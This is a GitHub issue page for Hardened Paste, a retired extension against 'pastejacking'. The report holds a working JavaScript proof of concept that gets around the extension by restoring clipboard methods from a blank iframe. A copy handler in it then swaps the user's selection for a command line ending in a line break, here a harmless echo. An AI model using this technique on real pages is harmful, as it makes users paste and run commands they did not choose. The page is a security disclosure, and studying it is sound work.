rocketshipapps / hardenedpaste

[Retired] Hardened Paste is a browser extension that prevents the “pastejacking” exploit.
http://hardenedpaste.com/
GNU General Public License v3.0

Bypasses via iFrames #8

Closed matt- closed 7 years ago

matt- commented 8 years ago
// Proof of concept from the issue report: once the DOM is ready, the page takes
// addEventListener and setData from a freshly created iframe and installs forwarding
// functions on its own prototypes, replacing whatever was there before.
// NOTE(review): presumably Hardened Paste wraps these methods on the page's prototypes;
// the extension's code is not shown here, so confirm against its source.
// Defensive takeaway: a wrapper placed on a prototype that page script can reach can be
// overwritten by that page, so it cannot serve as the enforcement point for clipboard checks.
document.addEventListener("DOMContentLoaded", function(event) {

    // Add a new iframe and keep its window object; no content is loaded and no source is set.
    // The script reads EventTarget and DataTransfer from this window instead of from the page.
    // Author's note: a blank document on the same domain could be loaded instead, with
    // ifrm.setAttribute("sandbox", 'allow-same-origin');
    var win = document.body.appendChild(document.createElement("IFRAME")).contentWindow;

    // Replace the page's addEventListener with a function that forwards to the iframe's
    // copy, keeping the original receiver (`this`) and arguments.
    EventTarget.prototype.addEventListener = function(type, listener, useCapture) {
        return win.EventTarget.prototype.addEventListener.call(this, type, listener, useCapture);
    }

    // Replace setData the same way; the console.log records each format/data pair written
    // to the clipboard.
    DataTransfer.prototype.setData = function(format, data){
        console.log(format, data);
        return win.DataTransfer.prototype.setData.call(this, format, data);
    }
    // Author's note: HTMLDocument.prototype.execCommand can be handled the same way if needed.

    // The pastejacking step itself: on copy, discard the user's selection and put a fixed
    // command line on the clipboard. The string ends in "\r\n", a line break.
    document.oncopy = function(e){
        e.clipboardData.setData('text/plain', 'echo "evil"\r\n');
        // Cancel the default copy so the browser keeps the data set above.
        e.preventDefault();
    };
});
oldestlivingboy commented 7 years ago

Thank you for the report – we’ve retired Hardened Paste, but the code remains available here.